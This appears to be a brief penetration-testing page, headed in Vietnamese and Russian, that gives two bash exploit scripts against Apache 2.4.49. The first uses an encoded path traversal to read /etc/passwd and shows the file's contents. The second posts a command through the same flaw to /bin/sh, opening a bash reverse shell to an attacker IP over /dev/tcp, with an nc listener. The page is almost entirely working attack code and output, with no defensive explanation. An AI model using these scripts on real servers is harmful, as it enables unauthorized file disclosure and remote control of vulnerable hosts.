
Kiểm thử xâm nhập
Тестирование на проникновение
1.1. Path Traversal (Чтение файла /etc/passwd) #!/bin/bash
TARGET_IP="128.0.0.100" URL="http://$TARGET_IP/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
echo "[+] Khai thác Path Traversal trên Apache 2.4.49..." curl -s "$URL" | head -n 5 # Hiển thị 5 dòng đầu của /etc/passwd
$ ./exploit_path_traversal.sh [+] Khai thác Path Traversal trên Apache 2.4.49... root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync
1.2. Remote Code Execution (Reverse Shell) #!/bin/bash
TARGET_IP="128.0.0.100" ATTACKER_IP="192.168.0.101" PORT="4444"
echo "[+] Gửi reverse shell đến $ATTACKER_IP:$PORT..."
curl -X POST
"http://$TARGET_IP/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
-H "Content-Type: application/x-www-form-urlencoded"
-d "echo; bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/$PORT 0>&1'"
nc -lvnp 4444
./exploit_apache_rce.sh